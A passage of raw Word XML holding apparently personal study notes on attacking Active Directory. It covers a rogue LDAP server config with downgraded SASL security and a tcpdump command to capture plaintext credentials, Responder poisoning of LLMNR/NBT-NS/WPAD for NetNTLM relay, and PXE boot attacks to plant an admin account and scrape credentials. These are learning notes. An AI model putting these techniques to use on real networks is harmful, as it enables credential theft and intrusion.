      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> authentication methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346B5E6" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">To do this </w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">create a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ldif </w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file, called with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD14F1" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:t>#olcSaslSecProps.ldif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D939F8" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:t>dn: cn=config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62919F75" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:t>replace: olcSaslSecProps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F2679" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:t>olcSaslSecProps: noanonymous,minssf=0,passcred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93A7B3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00875E03" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olcSaslSecProps: Specifies the SASL security properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95839F" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00875E03" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>noanonymous: Disables mechanisms that support anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E765DF" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00875E03" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BE032" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00875E03" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875E03">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Now we can use the ldif file to patch our LDAP server using the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414C33F" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00875E03" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:t xml:space="preserve">sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif &amp;&amp; sudo </w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00875E03">
        <w:t>service slapd restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92FCA3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now Run our LDAP server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F2CE42" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52916">
        <w:t>$ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF9A08" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00B52916" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00B52916">
        <w:t>If we receive the following error: "This distinguished name contains invalid syntax". If you receive this error, we can use a tcpdump to capture the credentials using the following command:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52916">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>sudo tcpdump -SX -i breachad tcp port 389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66251FDD" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39443DE6" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A076784" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4484E">
        <w:t>Authentication Relays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AE6F4" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00EF74EF" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00EF74EF">
        <w:t>Services talking to each other need to identify themselves, so there is an Authentication between them, for example SMP use NetNTLM Authentication</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781AFAB9" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E11947A" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="005171BA" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Server Message Block (SMB) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379DD2B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00EF74EF">
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF74EF">
        <w:t xml:space="preserve"> communication protocol used to provide shared access to files and printers across nodes on a network</w:t>
      </w:r>
      <w:r>
        <w:t>, ex: communication between a workstation and printer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35269416" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00244110" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00244110">
        <w:lastRenderedPageBreak/>
        <w:t>Since the NTLM Challenges can be intercepted, we can use offline cracking techniques to recover the password associated with the NTLM Challenge. However, this cracking process is significantly slower than cracking NTLM hashes directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240BE530" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00244110" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00244110">
        <w:t>We can use our rogue device to stage a man in the middle attack, relaying the SMB authentication between the client and server, which will provide us with an active authenticated session and access to the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77642A11" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58AEC0E4" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Responder allows us to perform Man-in-the-Middle attacks by poisoning the responses during NetNTLM authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432AC844" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00725BEE">
        <w:t xml:space="preserve">It’s like: you open a server that other services may require, then when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00725BEE">
        <w:t>thy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00725BEE">
        <w:t xml:space="preserve"> make a request your server act as the original server and then intercept the DNS Requests (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00725BEE">
        <w:t>specially</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00725BEE">
        <w:t xml:space="preserve"> LLMNR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B519F95" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00725BEE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t>Responder Can be used to listen for multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656410E3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00244110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00244110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> will attempt to poison any Link-Local Multicast Name Resolution (LLMNR</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00244110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>),  NetBIOS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00244110">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> Name Service (NBT-NS), and Web Proxy Auto-Discovery (WPAD) requests that are detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE8B4AC" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On large Windows networks, these protocols allow hosts to perform their own local DNS resolution for all hosts on the same local network. Rather than overburdening network resources such as the DNS servers, hosts can first attempt to determine if the host they are looking for is on the same local network by sending out LLMNR requests and seeing if any hosts respond</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C680D03" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00244110" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">With Responder we can Intercept these name resolution queries that are broadcasted to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network,</w:t>
      </w:r>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> try to</w:t>
      </w:r>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> force the client to connect to our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. In the same line, it starts to host several servers such as SMB, HTTP, SQL, and others to capture these requests and force authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC826D3" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="005171BA" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F86345B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="005171BA" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005171BA">
        <w:t xml:space="preserve">This attack </w:t>
      </w:r>
      <w:r>
        <w:t>relies</w:t>
      </w:r>
      <w:r w:rsidRPr="005171BA">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005171BA">
        <w:t>there is no DNS record for this server on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9380BE" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BED243" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005171BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intercepting NetNTLM Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E953AFE" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39CDE39C" wp14:editId="6F012EAA">
            <wp:extent cx="5943600" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="911016084" name="Picture 1" descr="A diagram of a person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6084" name="Picture 1" descr="A diagram of a person with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E04F644" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F68804A" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="007154B2">
        <w:t>Microsoft Deployment Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670EA52B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D8657C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MDT and SCCM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3606D" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00D8657C" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00D8657C">
        <w:t>Microsoft Deployment Toolkit (MDT) is a Microsoft service that assists with automating the deployment of Microsoft Operating Systems (OS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:t>MDT is used for new deployments</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F70E77" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="00D8657C" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00D8657C">
        <w:t>MDT is integrated with Microsoft's System Center Configuration Manager (SCCM), which manages all updates for all Microsoft applications, services, and operating systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:t xml:space="preserve">SCCM </w:t>
      </w:r>
      <w:r>
        <w:t>used for</w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:t xml:space="preserve"> patch management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2AF0B" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0131FB3D" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="002B67FF" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B67FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preboot Execution Environment (PXE) boot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:t>One of MDT Configuration ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757FF626" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="002B67FF" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="002B67FF">
        <w:t>Organizations use PXE boot to allow new devices that are connected to the network to load and install the OS directly over a network connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49130957" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="002B67FF">
        <w:t>MDT can be used to create, manage, and host PXE boot images</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A2572" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="002B67FF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PXE boot is usually integrated with </w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, which means that if DHCP assigns an IP lease, the host is allowed to request the PXE boot image and start the network OS installation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B7442" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E1CEC0" wp14:editId="6FC54FF9">
            <wp:extent cx="5943600" cy="1167765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1734037164" name="Picture 2" descr="A computer with arrows pointing to th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37164" name="Picture 2" descr="A computer with arrows pointing to the scree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67765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287ECE8" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GOAL:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B67FF">
        <w:t xml:space="preserve">Inject a privilege escalation vector, such as a Local Administrator account, to gain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B67FF">
        <w:t>Administrative</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B67FF">
        <w:t xml:space="preserve"> access to the OS once the PXE boot has been completed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B67FF">
        <w:t>Perform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B67FF">
        <w:t xml:space="preserve"> password scraping attacks to recover AD credentials used during the install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53984D88" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TFTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t xml:space="preserve"> is used for recovery of files from the MDT server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E33EAA" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRPr="002B67FF" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r w:rsidRPr="00F83C6D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Recap</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7B494" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t xml:space="preserve">MDT is a service used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83C6D">
        <w:t>create and host PXE Boot images</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10079425" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:r>
        <w:t>PXE Boot Images is used to enable users in domain to load it and install OSs using this boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB0505" w14:textId="77777777" w:rsidR="00203EBE" w:rsidRDefault="00203EBE" w:rsidP="00203EBE">
      <w:pPr>
        <w:rPr>
